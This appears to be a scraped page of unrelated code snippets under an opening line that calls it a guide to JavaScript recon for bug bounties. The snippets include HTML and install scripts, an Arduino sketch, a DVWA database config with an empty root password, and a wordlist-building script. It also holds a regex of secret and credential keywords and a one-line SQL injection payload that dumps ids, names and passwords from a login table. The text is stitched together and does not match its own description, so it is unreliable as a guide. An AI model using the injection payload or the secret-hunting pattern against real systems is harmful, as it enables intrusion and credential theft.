This is a simple guide to performing JavaScript recon in bug bounty work.
- The first step is to collect as many JavaScript files as possible (
more files = more paths and parameters -> more potential vulns)
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <title>ReqBin UI</title> | |
| <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet"> | |
| </head> | |
| <body class="bg-light"> | |
| <div class="container py-4"> |
| # MySQL client headers plus the build toolchain; -y skips the confirmation prompt |
| sudo apt install -y default-libmysqlclient-dev build-essential pkg-config |
| import pyautogui | |
| import time | |
| import csv | |
| # Open the CSV file | |
| with open('sample.csv', 'r', newline='') as file: | |
| r = csv.reader(file) | |
| # Prompt before starting the process (only once) | |
| pyautogui.alert('Click OK to start the process.') |
| // Define the pins for the PIR sensor and the buzzer | |
| const int pirPin = 2; // PIR sensor output pin | |
| const int buzzerPin = 8; // Buzzer pin | |
| void setup() { | |
| // Serial link for debug output at 9600 bps | |
| Serial.begin(9600); | |
| // PIR output is read, buzzer is driven | |
| pinMode(pirPin, INPUT); | |
| pinMode(buzzerPin, OUTPUT); | |
| } |
| <?php | |
| // Connection settings for a local DVWA instance: root with an empty password on localhost. | |
| // Hard-coded root credentials with no password are lab-only configuration; outside an isolated lab this exposes the whole database. | |
| $server = 'localhost'; | |
| $user = 'root'; | |
| $pass = ''; | |
| $db = 'db_dvwa'; | |
| // server_name, user_name, password, database name | |
| // Returns a connection handle (the name "cursor" is misleading); a failed connection is not checked here. | |
| $cursor = mysqli_connect($server, $user,$pass, $db ); |
| #!/bin/bash | |
| # Installs Docker Engine on Ubuntu from Docker's own apt repository. | |
| # No set -e / pipefail: a failed step (e.g. the key download) is not fatal and the script keeps going. | |
| echo "Installing Docker" | |
| sudo apt update | |
| # Neither apt install line passes -y, so both prompt for confirmation (interactive). | |
| sudo apt install apt-transport-https ca-certificates curl software-properties-common | |
| # Docker's signing key goes into a dedicated keyring rather than the global trusted set; the repo entry below pins it with signed-by. | |
| curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg | |
| # Repo entry for this host's Ubuntu codename; only packages signed by the keyring above are accepted from it. | |
| echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null | |
| sudo apt update | |
| sudo apt install docker-ce docker-ce-cli containerd.io | |
| # Start the daemon now and enable it at boot. | |
| sudo systemctl start docker | |
| sudo systemctl enable docker |
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
| (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(login)WHERE(@x)IN(@x:=CONCAT(0x20,@x,id,0x3a3a,name,0x3a3a,pass,0x3c62723e))))x) |
| #! /bin/bash | |
| ## This script fetches JS files from a domain name and builds a wordlist from the words found in those JS files | |
| ## Credit: https://gist.github.com/aufzayed/6cabed910c081cc2f2186cd27b80f687 | |
| ##### Install requirements ##### | |
| ##### Before running this script you should install Go ##### | |
| ## Install subjs (https://github.com/lc/subjs) | |
| GO111MODULE=on go get -u -v github.com/lc/subjs |